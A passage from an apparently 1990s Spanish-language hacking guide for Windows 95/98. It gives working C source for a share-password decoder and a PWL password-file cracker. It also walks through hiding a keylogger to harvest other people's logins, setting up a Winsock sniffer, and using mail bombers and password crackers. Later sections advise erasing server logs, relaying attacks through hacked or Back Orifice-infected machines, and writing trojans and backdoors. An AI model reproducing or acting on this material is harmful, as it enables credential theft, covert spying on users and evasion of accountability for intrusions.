  2147.     blockl1 = 1;
  2148.     switch (blockl2) {
  2149.     case 1:
  2150.           code = 0x13;
  2151.           blockl2++;
  2152.       break;
  2153.     case 2:
  2154.           code = 0x33;
  2155.           blockl2++;
  2156.           break;
  2157.     case 3:
  2158.           code = 0x23;
  2159.           blockl2++;
  2160.       break;
  2161.     case 4:
  2162.       code = 0x73;
  2163.           blockl2 = 1;
  2164.           break;
  2165.     }
  2166.     break;
  2167.       }
  2168.       break;
  2169.     }
  2170.     i++;
  2171.   }
  2172.   if (i == 256) retval = 0;
  2173.   else *mychar = i + 32;
  2174.   return retval;
  2175. }    /* End of DecodeCharFive() */
  2176.  
  2177. int DecodeCharSix(unsigned char *mychar) {
  2178.   int i = 0;
  2179.   int cletter = 1;
  2180.   int blockl1 = 1;
  2181.   int blockl2 = 1;
  2182.   int retval = 1;
  2183.   unsigned char code = 0x89;    /* The code for a space */
  2184.   while((i<256) && (code != *mychar)) {
  2185.     switch (cletter) {
  2186.     case 1:
  2187.       code--;
  2188.       cletter++;
  2189.       break;
  2190.     case 2:
  2191.       code += 3;
  2192.       cletter++;
  2193.       break;
  2194.     case 3:
  2195.       code--;
  2196.       cletter++;
  2197.       break;
  2198.     case 4:
  2199.       code += 3;
  2200.       cletter++;
  2201.       break;
  2202.     case 5:
  2203.       code--;
  2204.       cletter++;
  2205.       break;
  2206.     case 6:
  2207.       code += 3;
  2208.       cletter++;
  2209.       break;
  2210.     case 7:
  2211.       code--;
  2212.       cletter++;
  2213.       break;
  2214.     case 8:
  2215.       cletter = 1;
  2216.       switch (blockl1) {
  2217.       case 1:
  2218.         code -= 13;
  2219.     blockl1++;
  2220.     break;
  2221.       case 2:
  2222.     code += 19;
  2223.         blockl1++;
  2224.     break;
  2225.       case 3:
  2226.         code -= 13;
  2227.     blockl1++;
  2228.     break;
  2229.       case 4:
  2230.     blockl1 = 1;
  2231.     switch (blockl2) {
  2232.     case 1:
  2233.           code = 0xe9;
  2234.       blockl2++;
  2235.       break;
  2236.     case 2:
  2237.           code = 0xc9;
  2238.       blockl2++;
  2239.       break;
  2240.     case 3:
  2241.           code = 0x29;
  2242.       blockl2++;
  2243.       break;
  2244.     case 4:
  2245.       code = 0x89;
  2246.           blockl2 = 1;
  2247.           break;
  2248.     }
  2249.     break;
  2250.       }
  2251.       break;
  2252.     }
  2253.     i++;
  2254.   }
  2255.   if (i == 256) retval = 0;
  2256.   else *mychar = i + 32;
  2257.   return retval;
  2258. }     /* End of DecodeCharSix() */
  2259.  
  2260. int DecodeCharSeven(unsigned char *mychar) {
  2261.   int i = 0;
  2262.   int cletter = 1;
  2263.   int blockl1 = 1;
  2264.   int blockl2 = 1;
  2265.   int retval = 1;
  2266.   unsigned char code = 0xf4;    /* The code for a space */
  2267.   while((i<256) && (code != *mychar)) {
  2268.     switch (cletter) {
  2269.     case 1:
  2270.       code++;
  2271.       cletter++;
  2272.       break;
  2273.     case 2:
  2274.       code++;
  2275.       cletter++;
  2276.       break;
  2277.     case 3:
  2278.       code++;
  2279.       cletter++;
  2280.       break;
  2281.     case 4:
  2282.       code -= 7;
  2283.       cletter++;
  2284.       break;
  2285.     case 5:
  2286.       code++;
  2287.       cletter++;
  2288.       break;
  2289.     case 6:
  2290.       code++;
  2291.       cletter++;
  2292.       break;
  2293.     case 7:
  2294.       code++;
  2295.       cletter++;
  2296.       break;
  2297.     case 8:
  2298.       cletter = 1;
  2299.       switch (blockl1) {
  2300.       case 1:
  2301.         code += 9;
  2302.     blockl1++;
  2303.     break;
  2304.       case 2:
  2305.     code -= 23;
  2306.         blockl1++;
  2307.     break;
  2308.       case 3:
  2309.         code += 9;
  2310.     blockl1++;
  2311.     break;
  2312.       case 4:
  2313.     blockl1 = 1;
  2314.     switch (blockl2) {
  2315.     case 1:
  2316.           code = 0x94;
  2317.       blockl2++;
  2318.       break;
  2319.     case 2:
  2320.           code = 0xb4;
  2321.       blockl2++;
  2322.       break;
  2323.     case 3:
  2324.           code = 0x54;
  2325.       blockl2++;
  2326.       break;
  2327.     case 4:
  2328.       code = 0xf4;
  2329.           blockl2 = 1;
  2330.           break;
  2331.     }
  2332.     break;
  2333.       }
  2334.       break;
  2335.     }
  2336.     i++;
  2337.   }
  2338.   if (i == 256) retval = 0;
  2339.   else *mychar = i + 32;
  2340.   return retval;
  2341. }   /* End of DecodeCharSeven() */
  2342.  
  2343. int DecodeCharEight(unsigned char *mychar) {
  2344.   int i = 0;
  2345.   int cletter = 1;
  2346.   int blockl1 = 1;
  2347.   int blockl2 = 1;
  2348.   int retval = 1;
  2349.   unsigned char code = 0x4a;    /* The code for a space */
  2350.   while((i<256) && (code != *mychar)) {
  2351.      switch (cletter) {
  2352.      case 1:
  2353.        code++;
  2354.        cletter++;
  2355.        break;
  2356.      case 2:
  2357.        code -= 3;
  2358.        cletter++;
  2359.        break;
  2360.      case 3:
  2361.        code++;
  2362.        cletter++;
  2363.        break;
  2364.      case 4:
  2365.        code += 5;
  2366.        cletter++;
  2367.        break;
  2368.      case 5:
  2369.        code++;
  2370.        cletter++;
  2371.        break;
  2372.      case 6:
  2373.        code -= 3;
  2374.        cletter++;
  2375.        break;
  2376.      case 7:
  2377.        code++;
  2378.        cletter++;
  2379.        break;
  2380.      case 8:
  2381.        cletter = 1;
  2382.        switch (blockl1) {
  2383.        case 1:
  2384.      code -= 11;
  2385.      blockl1++;
  2386.      break;
  2387.        case 2:
  2388.      code += 21;
  2389.      blockl1++;
  2390.      break;
  2391.        case 3:
  2392.      code -= 11;
  2393.      blockl1++;
  2394.      break;
  2395.        case 4:
  2396.      blockl1 = 1;
  2397.      switch (blockl2) {
  2398.      case 1:
  2399.        code = 0x2a;
  2400.        blockl2++;
  2401.        break;
  2402.      case 2:
  2403.        code = 0x0a;
  2404.        blockl2++;
  2405.        break;
  2406.      case 3:
  2407.        code = 0xea;
  2408.        blockl2++;
  2409.        break;
  2410.      case 4:
  2411.        code = 0x4a;
  2412.        blockl2 = 1;
  2413.        break;
  2414.      }
  2415.      break;
  2416.        }
  2417.        break;
  2418.      }
  2419.      i++;
  2420.   }
  2421.   if (i == 256) retval = 0;
  2422.   else *mychar = i + 32;
  2423.   return retval;
  2424. }    /* End of DecodeCharEight() */
  2425.  
  2426. /* End of program */
  2427.  
  2428. ------------ FIN -------------------------------------------------------------
  2429.  
  2430.    Cuando ejecutemos el programa nos saldra esto:
  2431.  
  2432.    c:\>sharepw
  2433.    Input the byte code in hex (ex: 76 d5 09 e3):
  2434.  
  2435.    Nos pide que introduzcamos el password en formato Hexadecimal. Hay muchas
  2436.    tablas por Internet para aquellos que no tengan una.
  2437.  
  2438.    5-6. Snadboy's revelation v1.1.
  2439.  
  2440.   En este apartado hablare sobre una interesante herramienta. El Snadboy es
  2441.   una tool que nos descripta los astericos de la tipica ventana que pide
  2442.   password. Si hay una ventana con un password y que no entendemos porque
  2443.   solo salen asteriscos, lo que tenemos que hacer es abrir el Snadboy y
  2444.   situarnos al lado de la ventana de password, la ventana del Snadboy tiene
  2445.   una "mira de punto", pinchamos encima de la mira y la arrastramos con el
  2446.   raton sobre la ventana del password situandonos encima del password,
  2447.   soltamos y en la ventana del Snadboy veremos el password descifrado.
  2448.  
  2449.   Como nota, este programa para lo que hace, ocupa mucho en el disco duro,por
  2450.   lo que puede ser un poco sospechoso o que los coders no lo han optimizado
  2451.   demasiado que digamos.
  2452.  
  2453.    5-7. Keylog95.
  2454.  
  2455.   Este programa nos sera muy util en sitio donde halla mucha gente, ya que
  2456.   es un Key recoder, o sea, una pequeña utilidad que se queda residente
  2457.   en memoria y graba todos los logins y password que la gente vaya metiendo.
  2458.  
  2459.   El programa es de sencillo manejo, pero tiene que haver unos pequeños
  2460.   requisitos, primero tener las librerias VBRUN300.DLL y QPRO200.DLL en el
  2461.   directorio c:\windows\system y ademas tener un directorio llamado c:\win,
  2462.   ya que es alli donde el programa grabara la informacion que obtenga, en
  2463.   un fichero llamado "logx", por lo que esto quedara:
  2464.  
  2465.   c:\win\logx
  2466.  
  2467.   Cuando las librerias esten metidas en el directorio System, windows creara
  2468.   un icono en la carpeta de Inico, por lo que es conveniente darle un
  2469.   atributo de Minimizado para que nadie lo pueda ver y asi siempre que se
  2470.   arranque Windows tambien lo hara el Keylog95 :)
  2471.  
  2472.    5-8. Glide.
  2473.  
  2474.   El Glide es otro programa que sirve para desencriptar un password's en
  2475.   Win95/98. Al igual que el Sharepw solo lo tenemos que compiLar y ejecutar
  2476.   con la salvedad que esta escrito en C++.
  2477.  
  2478. ------------ Codigo Fuente ---------------------------------------------------
  2479.  
  2480. #include <stdio.h>
  2481. #include <string.h>
  2482. #include <process.h>
  2483. #include <stdlib.h>
  2484. #include <ctype.h>
  2485. #include <conio.h>
  2486.  
  2487. unsigned char huge Data[100001];
  2488. unsigned char keystream[1001];
  2489. int Rpoint[300];
  2490.  
  2491. void main (int argc,char *argv[]) {
  2492.     FILE *fd;
  2493.     int     i,j,k;
  2494.     int    size;
  2495.     char ch;
  2496.     char *name;
  2497.     int cracked;
  2498.     int sizemask;
  2499.     int maxr;
  2500.     int rsz;
  2501.     int pos;
  2502.     int Rall[300]; /* recource allocation table */
  2503.  
  2504.  
  2505.     if (argc<2) {
  2506.         printf("usage: glide filename (username)");
  2507.         exit(1);
  2508.     }
  2509.  
  2510.     /* read PWL file */
  2511.  
  2512.     fd=fopen(argv[1],"rb");
  2513.     if(fd==NULL) {
  2514.         printf("can't open file %s",argv[1]);
  2515.         exit(1);
  2516.     }
  2517.     size=0;
  2518.     while(!feof(fd)) {
  2519.         Data[size++]=fgetc(fd);
  2520.     }
  2521.     size--;
  2522.     fclose(fd);
  2523.  
  2524.     /* find username */
  2525.     name=argv[1];
  2526.     if(argc>2) name=argv[2];
  2527.     printf("Username: %s\n",name);
  2528.  
  2529.     /* copy encrypted text into keystream */
  2530.     cracked=size-0x0208;
  2531.     if(cracked<0) cracked=0;
  2532.     if(cracked>1000) cracked=1000;
  2533.     memcpy(keystream,Data+0x208,cracked );
  2534.  
  2535.     /* generate 20 bytes of keystream */
  2536.     for(i=0;i<20;i++) {
  2537.         ch=toupper(name[i]);
  2538.         if(ch==0) break;
  2539.         if(ch=='.') break;
  2540.         keystream[i]^=ch;
  2541.     };
  2542.     cracked=20;
  2543.  
  2544.  
  2545.     /* find allocated recources */
  2546.  
  2547.     sizemask=keystream[0]+(keystream[1]<<8);
  2548.     printf("Sizemask: %04X\n",sizemask);
  2549.  
  2550.     for(i=0;i<256;i++) Rall[i]=0;
  2551.  
  2552.     maxr=0;
  2553.     for(i=0x108;i<0x208;i++) {
  2554.         if(Data[i]!=0xff) {
  2555.             Rall[Data[i]]++;
  2556.             if (Data[i]>maxr) maxr=Data[i];
  2557.         }
  2558.     }
  2559.         maxr=(((maxr/16)+1)*16);      /* recource pointer table size appears
  2560.                                          to be divisable by 16 */
  2561.  
  2562.     /* search after recources */
  2563.  
  2564.     Rpoint[0]=0x0208+2*maxr+20+2;    /* first recource */
  2565.     for(i=0;i<maxr;i++) {
  2566.         /* find size of current recource */
  2567.         pos=Rpoint[i];
  2568.         rsz=Data[pos]+(Data[pos+1]<<8);
  2569.         rsz^=sizemask;
  2570.         printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i
  2571.                 ,Rall[i]);
  2572.         if( (Rall[i]==0) && (rsz!=0) ) {
  2573.             printf("unused resource has nonzero size !!!\n");
  2574.             printf("If last line produced any : You
  2575.                         may try to recover\n");
  2576.             printf("press y to attempt recovery\n");
  2577.             ch=getch();
  2578.             if(ch!='y') exit(0);
  2579.             rsz=2;
  2580.             i-=1;
  2581.         }
  2582.  
  2583.         pos+=rsz;
  2584.  
  2585.         /* Resources have a tendency to have the wrong size for
  2586.                 some reason */
  2587.         /* check for correct size */
  2588.  
  2589.         if(i<maxr-1) {
  2590.             while(Data[pos+3]!=keystream[1]) {
  2591.                 printf(":",Data[pos+3]);
  2592.                 pos+=2; /* very rude may fail */
  2593.             }
  2594.         }
  2595.  
  2596.         pos+=2;    /* include pointer in size */
  2597.         Rpoint[i+1]=pos;
  2598.     }
  2599.     Rpoint[maxr]=size;
  2600.  
  2601.     /* insert Table data into keystream */
  2602.     for(i=0;i <= maxr;i++) {
  2603.         keystream[20+2*i]^=Rpoint[i] & 0x00ff;
  2604.         keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
  2605.     }
  2606.     cracked+=maxr*2+2;
  2607.  
  2608.     printf("%d bytes of keystream recovered\n",cracked);
  2609.  
  2610.     /* decrypt resources */
  2611.     for(i=0;i < maxr;i++) {
  2612.                rsz=Rpoint[i+1]-Rpoint[i];
  2613.                if (rsz>cracked) rsz=cracked;
  2614.                printf("Recource[%d] (%d)\n",i,rsz);
  2615.                for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
  2616.                printf("\n");
  2617.     }
  2618.     exit(0);
  2619. }
  2620.  
  2621. ------------ FIN -------------------------------------------------------------
  2622.  
  2623.    Cuando lo ejecutemos nos saldra lo siguiente:
  2624.  
  2625.    c:\>glide
  2626.    usage: glide filename (username)
  2627.  
  2628.    Pidiendo el fichero y el login.
  2629.  
  2630.    5-9. Win95 anonymail v 1.0.
  2631.  
  2632.   Este sencillo programa nos sera de gran ayuda para enviar mail anonimo.
  2633.   Cuando ejecutemos el programa nos saldra una ventana con los siguientes
  2634.   campos:
  2635.  
  2636.   Host
  2637.  
  2638.   From
  2639.  
  2640.   To
  2641.  
  2642.   Subject
  2643.  
  2644.   Solo tenemos que rellenarlos correctamente y pulsar el "send" para enviar
  2645.   el mail anonimo y cuando hayamos acabado pulsar "quit".
  2646.  
  2647.   Un programa muy sencillo que nos puede ser util. Como nota, el autor nos
  2648.   advierte que nadie le envie mail anonimo con su programa, por lo que se
  2649.   puede deducir que es un farol o que el programa no es tan anonimo, por
  2650.   lo que el autor le habra metido un troyano.
  2651.  
  2652.    5-10. Hacker's Utility, V 1.02.
  2653.  
  2654.   Este magnifico programa es una suite para Hackers. Para que nos entendamos,
  2655.   este programa esta compuesto por muchos otros programas y asi dispones
  2656.   de un paquete perfecto para un Hacker.
  2657.  
  2658.   Cuando ejecutamos este programa nos aparecera una ventana con un menu
  2659.   arriba, y cuando abramos una de estas opciones se abrira otra ventana
  2660.   con mas opciones. Ahora podemos ver el menu principal compuesto por
  2661.   los submenus:
  2662.  
  2663.    File -> HU setup, exit
  2664.  
  2665.    Cracking -> crack passwords -> crack zip passwords
  2666.                                   crack passwd files
  2667.                                   passwd jackpot
  2668.                words prcessing -> words wizard
  2669.                                   xtrakt words
  2670.                                   sort
  2671.  
  2672.    Tools -> create & fill a dummy fill, compare binary files
  2673.  
  2674.    Network -> finger, port scanner, ip <> name converter
  2675.  
  2676.    Other Stuff -> hackers's test, serial numbers, extracting/ripping sound
  2677.                   files, extracting/ripping graphic files, manual extract/
  2678.                   rip files
  2679.  
  2680.    System -> dos prompt, run custom application, shut down
  2681.  
  2682.    Window -> cascade, tile horizontal, tile vertical, arrange icons,
  2683.              main toolbar, main status bar
  2684.  
  2685.    Help -> tip of day, index, using help, about Hacker's Utility
  2686.    
  2687.   La verdad es que esta suite esta muy completa y nos sera de gran ayuda. Por
  2688.   ejemplo el sistema se puede configurar en File->HU setup para que sea mas
  2689.   personal. Cabe destacar ciertas utilidades como los crackeadores que tiene
  2690.   incorporados para crackear el passwd de un Unix o romper el password de
  2691.   un fichero zip. Luego en la seccion de Network, las utilidades nos seran
  2692.   de mucha ayuda, como el Finger, el scaneador de puertos y el convertidor
  2693.   de direcciones IP. Esto en mi opion seria lo mejor del programa pero
  2694.   luego trae otras cosas que tambien nos pueden servir para al menos
  2695.   divertinos un rato, esto es el caso del Hacker's Test, por ejemplo podemos
  2696.   activar el Port Scanner y mientras esperamos a los resultados podemos
  2697.   hacer un test para saber si somos buenos Hackers.
  2698.  
  2699.   La verdad es que es una magnifica herramienta que los Hackers de win deben
  2700.   tener.
  2701.  
  2702.    5-11. Haktek v1.1.
  2703.  
  2704.   AL igual que el HU, Haktek, es una suite que tambien nos sera de gran
  2705.   ayuda. Pero esta suite esta mas enfocada a atacar por Internet, logicamente
  2706.   con el peligro que ello conlleva.
  2707.  
  2708.   Al ejecutar el programa, se abrira una ventana en la que veremos una serie
  2709.   de iconos en la parte izquierda de la ventana y una pantalla de texto que
  2710.   nos explica cada icono. Empezando de arriba para abajo:
  2711.  
  2712.   Diskette-> graba la sesion (lo que esta en pantalla y lo que hallamos hecho
  2713.              con el programa).
  2714.  
  2715.   X -> prepara la sesion, borrando la pantalla de texto.
  2716.  
  2717.   ? -> nos habla sobre sus autores.
  2718.  
  2719.   Circulo -> señalos un objetivo, por defecto www.microsoft.com.
  2720.  
  2721.   Antena -> Utilidad ping.
  2722.  
  2723.   Gafas -> scaneador de puertos.
  2724.  
  2725.   Bomba -> bombardeador de correo.
  2726.  
  2727.   Stop bomb -> para protegernos de un mailbomber.
  2728.  
  2729.   Radio -> scaneador de IP'S.
  2730.  
  2731.   Prismaticos -> para enviar finger nulos.
  2732.  
  2733.   La verdad es que es una suite muy completa y nos ayudara a joder a todo
  2734.   el que se ponga por delante. Con un poco de practica dominaremos este
  2735.   programa a la perfeccion.
  2736.  
  2737.    5-12. Claymore Brute Force.
  2738.  
  2739.   Esta utlidad no sera de gran ayuda para desemcriptar passowrd's de un
  2740.   fichero passwd de Unix. Cuando lo ejecutemos se abrira una ventana con
  2741.   varias opciones, de facil manejo, para aquellos que quieren algo simple y
  2742.   corriendo sobre win95. Este crackeador es de fuerza bruta pudiendo ser
  2743.   algo lento.
  2744.  
  2745.    5-13. Skream's Port Listener V 2.3.
  2746.  
  2747.   En muchas ocasiones nos gustaria saber que pasa en nuestros puertos, esta
  2748.   simple pero estupenda herramienta nos sera muy util, ya que la podemos
  2749.   ejecutar y configurarla para que escuche en el puerto que queramos, asi
  2750.   podemos saber quien o que esta conectado a nuestros puertos. Por defecto
  2751.   el programa escucha en el puerto 139 (os suena?)
  2752.  
  2753.   El programa nos permite escuchar en el puerto que querramos, ademas podemos
  2754.   logear todo el proceso en un fichero.
  2755.  
  2756.    5-14. WSOCK32 Winsock Spy Facility Version .91
  2757.  
  2758.   Podemos usar esta DLL para espiar un sistema informatico, ya que es un
  2759.   sniffer :), solo funciona en Win95/98. No es dificil de utilizar, los pasos
  2760.   a seguir son:
  2761.  
  2762.   #1- Copiar el WSOCK32.DLL y ubicarlo en el directorio del programa que
  2763.       querramos espiar.
  2764.  
  2765.   #2- Configurar las siguientes variables:
  2766.  
  2767.     > SET WSOCK_LOG=LOG
  2768.     > SET WSOCK_FLAGS=s
  2769.  
  2770.   #3- Normalmente Windows instala el estandar WSOCK32.DLL en la siguiente ruta
  2771.       C:\WINDOWS\SYSTEM\WSOCK32.DLL por eso debemos configurar el path de
  2772.       nuestra DLL, en el lugar donde este de la siguiente manera:
  2773.  
  2774.     > SET WSOCK_PATH=<el path de nuestro WSOCK32.DLL>
  2775.  
  2776.   #4- Ejecutar el programa WinSock.
  2777.  
  2778.   #5- Recibiras un mensaje que esta logeando.
  2779.  
  2780.   #6- Ya puedes salir del programa.
  2781.  
  2782.   #7- Busca un fichero llamado LOG.XXX donde las XXX son tres digitos en
  2783.       hexadecimal.
  2784.  
  2785.   #8- El fichero Log contendra toda la sesion del Winsock :)
  2786.  
  2787.   El programa dispone de mas opciones de configuracion, que podemos ver como
  2788.   usar leyendo la estupenda documentacion de trae. Ahora ya no tenemos excusa
  2789.   alguna de que no podemos pillar "informacion sensible." 
  2790.  
  2791.    5-15. PWlTool V 4.0.
  2792.  
  2793.   Podemos usar esta herramienta para desencriptar los famosos pwl's. La verdad
  2794.   es que es una herramienta muy interesante y potente. Al ejecutar el programa
  2795.   nos aparecera una ventana con multitud de opciones, incluso el nombre del
  2796.   usuario que estemos usando en el momento.
  2797.  
  2798.   El programa nos permite buscar passwords (o sea ficheros pwl's), ademas
  2799.   tambien comprueba a los usuarios. El programa lo podemos dejar en modo
  2800.   zombie, eso significa que trabaja en background y no nos daremos cuenta que
  2801.   esta desencriptando los passwords, ademas es el modo que se recomienda
  2802.   utilizar.
  2803.  
  2804.   Es una herramienta de considero bastante completa y vital para todo aquel
  2805.   hacker de Windows.
  2806.  
  2807.    5-16. PwlView V 1.01.
  2808.  
  2809.   Volvemos con otro programa para averiguar los ficheros pwl's :) Ejecutamos
  2810.   el siguiente fichero :
  2811.  
  2812.   c:\>pwlview
  2813.   There is no security in this crazy world!
  2814.   Win95 PWL viewer v1.01 (c) 1997, 98 Vitas Ramanchauskas
  2815.   http://webdon.com, e-mail:vitas@webdon.com vitas@rocketmail.com, ICQ:3024702
  2816.  
  2817.   ************
  2818.   !DISCLAIMER!
  2819.   !This program intended to be used for legal purpose only!
  2820.   ************
  2821.  
  2822.   This program shows cached passwords using standard (but undocumented)
  2823.   Windows API on local machine for current user (user must be logged in).
  2824.   There is much more powerful version of this program named pwltool
  2825.   is available at http://webdon.com/vitas . But it has larger size...
  2826.   You may invoke pwlview in this way: pwlview >> textfile.txt
  2827.   to save passwords in file (don't forget to press enter twice)
  2828.   Press Enter to begin...
  2829.  
  2830.   Y este es el mensaje que nos saca, el programa esta esperando a que pulsemos
  2831.   el "boton cualquiera" para buscar los pwl's, ahora aprieto el boton y me
  2832.   sale lo siguiente:
  2833.  
  2834.   No passwords found.
  2835.   Probably password caching was not used or user is not logged in.
  2836.  
  2837.   Press Enter to quit
  2838.  
  2839.   En mi caso sale negativo, debido a que no tengo ningun fichero pwl's :) Otro
  2840.   programa que nos conviene tener en nuestras coleccion de herramientas.
  2841.  
  2842.   6. Medidas De Seguridad.
  2843.  
  2844.   En esta seccion hablare sobre varios aspectos muy importanes, logicamente
  2845.   la seguridad personal, de nuestro ordenador, etc... Para que nadie pueda
  2846.   jodernos aunque nos movamos por Win95/98.
  2847.  
  2848.    6-1. Protegiendo Nuestro Ordenador.
  2849.  
  2850.   Nuestro ordenador corriendo con Win95/98, sera propenso a muchos tipos de
  2851.   ataques diferentes. Por ello conviene estar preparado y sobre estar
  2852.   alerta sobre las nuevas cosas que surgen por el mundo Underground, el mejor
  2853.   medio son los e-zines y por supuesto buenos amigos por el IRC.
  2854.  
  2855.     6-1-1. Ataques Tipicos a Nuestro Windows.
  2856.  
  2857.   Logicamente seremos muy propensos a ataques tipo DoS (denial of service),
  2858.   como son el LAND, BONK, TEARDROP y por supuesto los famosos nukes, OOB,
  2859.   etc ...
  2860.  
  2861.   Para estar protegidos lo que tenemos que hacer es pasarnos por los
  2862.   web's de seguridad o el de la casa Microsoft en los cuales se cuelgan
  2863.   los parches de estos ataques. No siempre funcioran pero nos ahorraran
  2864.   muchos disgustos en muchos casos. La gente suele ser muy propensa a estas
  2865.   cosas porque no esta informada sobre estos ataques y por consiguiente
  2866.   no se instala los parches correspondientes.
  2867.  
  2868.     6-1-2. Encriptacion de Nuestra Informacion.
  2869.  
  2870.   La informacion sensible que tengamos en nuestro disco duro conviene que
  2871.   este encriptada con algun buen programa de encriptacion del tipo PGP, el
  2872.   cual no puede ser roto en estos tiempos.
  2873.  
  2874.   Tambien podemos hacer uso de la Stereografia, el arte de ocultar la
  2875.   informacion. Hay varios programas en Internet que nos permiten esconder
  2876.   ficheros de txt en ficheros graficos o de sonido, por supuesto habra
  2877.   que tener cuidado cuando hacemos estas operaciones, debido a la diferencia
  2878.   de formatos entre los ficheros.
  2879.  
  2880.   Incluso podemos encriptar todo o parte del disco duro para mayor seguridad
  2881.   en nuestros datos.
  2882.  
  2883.   Lo recomendado es usar el PGP 5.0 o incluso la version 6, las cuales nos
  2884.   seran de gran utilidad para encriptar nuestros ficheros ademas como son
  2885.   para Windows todo sera por las tipicas ventanas, mas facil imposible.
  2886.  
  2887.     6-1-3. Eliminar Informacion De Forma Segura.
  2888.  
  2889.   Cuando borramos un fichero del disco duro, realmente no esta borrado, por
  2890.   lo que puede ser rescatado mediante herramientas especiales. Esto no
  2891.   es conveniente si por el caso nuestro ordenador cae en malos manos y nos
  2892.   ha dado tiempo a borrar algunos ficheros, no serviria de nada ya que
  2893.   podrian recuperar la informacion.
  2894.  
  2895.   Para borrar ficheros que contegan informacion muy privada o no queremos
  2896.   que nadie la pueda obtener, conviene borrar este fichero mediante algun
  2897.   programa especial para el borrado de ficheros. Existen por Internet
  2898.   programas muy buenos para ello o tambien podemos leernos un fichero
  2899.   sobre este tema, de recomendable lectura:
  2900.  
  2901.         Secure Deletion of Data from Magnetic and Solid-State Memory
  2902.                                                       
  2903.                                Peter Gutmann
  2904.                        Department of Computer Science
  2905.                            University of Auckland
  2906.                          pgut001@cs.auckland.ac.nz
  2907.  
  2908.   El PGP version 5 y tambien la 6, disponen de una opcion para borrar un
  2909.   fichero de nuestro disco duro de forma segura o sea que no teneis excusa
  2910.   para no usarla!!!
  2911.  
  2912.     6-1-4. Eliminacion De Virus.
  2913.  
  2914.   Los virus son una de las peores pesadillas, pero en realidad no entiendo
  2915.   porque, ya que son solo programas. Y no son dificiles de controlar. Solo
  2916.   conviene tener un buen antivirus o varios, si, tambien los hay por internet
  2917.   a patadas y gratis.
  2918.  
  2919.   Incluso muchos virus se pueden anular mediante un par de comandos del
  2920.   MS-DOS, es simplemente conocer un poco los virus, logicamente se sale de
  2921.   la tematica de esta guia. Pero la realidad es que no hay que tener miedo
  2922.   de los virus. Si nuestro ordenador esta infectado, lo primero que tenemos
  2923.   que hacer es calmarnos, luego hacer una copia de seguridad de nuestro
  2924.   disco duro (da igual si esta infectado), por si el virus, en el peor de
  2925.   los casos borra el disco duro y ahora buscar una vacuna disponible.
  2926.  
  2927.   Si fuese el caso que nuestro antivirus no quita el virus, pues simplemente
  2928.   hacemos una copia y lo enviamos a alguna empresa de seguridad informatica
  2929.   ya que seguro que nos sacan un antivirus.
  2930.  
  2931.   Los virus para Windows cada dia estan aumentando, por lo que conviene estar
  2932.   atento de que AntiVirus los pueden eliminar. No me estoy refiriendo a virus
  2933.   Macros sino a autenticos virus, incluso algunos capazes de borrar
  2934.   informacion de nuestro disco duro.
  2935.  
  2936.   Estos virus disponen de tecnicas stealh, polimorficos, etc. o sea que
  2937.   tened cuidado y estar alerta y tener unas buenas copias de seguridad, por
  2938.   si acaso.
  2939.  
  2940.    6-2. Protegiendo Nuestras Acciones.
  2941.  
  2942.   Esta seccion esta enfocada a esconder nuestros actos hacking por Internet.
  2943.   Ya que todo lo que hagamos dejaremos huellas y por desgracia la gente no
  2944.   se entera de esto y deja muchas pistas.
  2945.  
  2946.     6-2-1. Borrando Nuestras Huellas.
  2947.  
  2948.   Cuando conectamos a un servidor, este graba lo que hacemos (cuando hemos
  2949.   conectado, como, desde donde y varias cosas mas), por eso hay que tener
  2950.   mucho cuidado.
  2951.  
  2952.   La mayoria de servidores que hackeemos por Internet seran unix, conviene
  2953.   tener a mano "zappers", son programas que borran nuestras huellas en el
  2954.   servidor. Existen muchos programas para este proposito que funcionan bajo
  2955.   Unix. Solo los tenemos que compilar en el servidor y ejecutarlos. Por
  2956.   desgracia al usar Win95/98 no podemos compilarlos en nuestro ordenador y
  2957.   subirlo por FTP pero algo es algo.
  2958.  
  2959.   Tambien tenemos que procurar esconder nuestra IP, hay muchos metodos
  2960.   para ello, la mas facil es usar nodos (servidores intermedios y asi
  2961.   dificultar nuestro rastreo). Un esquema simple seria el siguiente:
  2962.  
  2963.     Hacker ------- Servidor ------ Servidor ------- Victima.
  2964.       |               |               |                |
  2965.     Nosotros    Primer servidor   Segundo servidor  Servidor victima
  2966.                 para despistar    para despistar
  2967.  
  2968.   Hoy en dia, podemos usar muy diferentes opciones para escondernos como por
  2969.   ejemplo, servidor que hayamos hackeado, sistemas con wingates o similares e
  2970.   incluso ordenadores que tenga el BO (Back Oriffice) instalado.
  2971.  
  2972.     6-2-2. Encriptando Nuestro Correo.
  2973.  
  2974.   Conviene encriptar nuestro correo, sobre todo si esta relacionado con el
  2975.   hacking, ya que asi nadie podra saber que pone y acusarnos de nada. Siempre
  2976.   podemos alegar "Privacidad en los Datos" :). Al igual que antes hay varios
  2977.   paquetes de PGP para mail.
  2978.  
  2979.   Incluso es recomendable el uso de cuentas anomimas de correo, aunque de
  2980.   esto la gente esta mas concenciada.
  2981.  
  2982.   Volvemos a hacer uso de nuestro querido programa PGP version 5 o 6, a gusto
  2983.   del consumidor.
  2984.  
  2985.   7. Sugerencias Para Un Mejor Hacking.
  2986.  
  2987.   Aqui hablare sobre algunas ideas que pueden potenciar el hacking en
  2988.   Win95/98 y la creacion de nuevas herramientas. 
  2989.  
  2990.    - Programas troyanos que capturen el password del acceso a Internet.
  2991.  
  2992.    - Programas para IP-Spoof.
  2993.  
  2994.    - Creacion de herramientas de redes para Win95/98.
  2995.  
  2996.    - Wardialers.
  2997.  
  2998.    - Programas para atacar otros Win95/98 (DoS).
  2999.  
  3000.    - Nuevas Suites.
  3001.  
  3002.    - Programas crackeadores del passwd.
  3003.  
  3004.    - Programas criptograficos.
  3005.  
  3006.    - Programas eliminadores de ficheros de forma segura.
  3007.  
  3008.    - Puertas traseras.
  3009.  
  3010.    - Programas de administracion remota.
  3011.  
  3012.    - Programas DoS para saltarse protecciones.
  3013.  
  3014.    - Programas que realmente proporcionen seguridad a nuestro sistema.
  3015.  
  3016.   8. Obtener Informacion.
  3017.  
  3018.   Todo el mundo esta harto de ver cientos de web's donde no hay nada o
  3019.   todo esta repetido. Pues ahora os pondre unas pautas que seguir para
  3020.   obtener la mayor fuente posible de informacion.
  3021.  
  3022.     - Web's sobre hack (que decir).
  3023.  
  3024.     - Web's sobre seguridad Informatica (aqui siempre podemos encontrar
  3025.       muchas cosas, que nos podran servir).
  3026.  
  3027.     - Los RFC (Informacion tecnica sobre Internet, protocolos, seguridad,
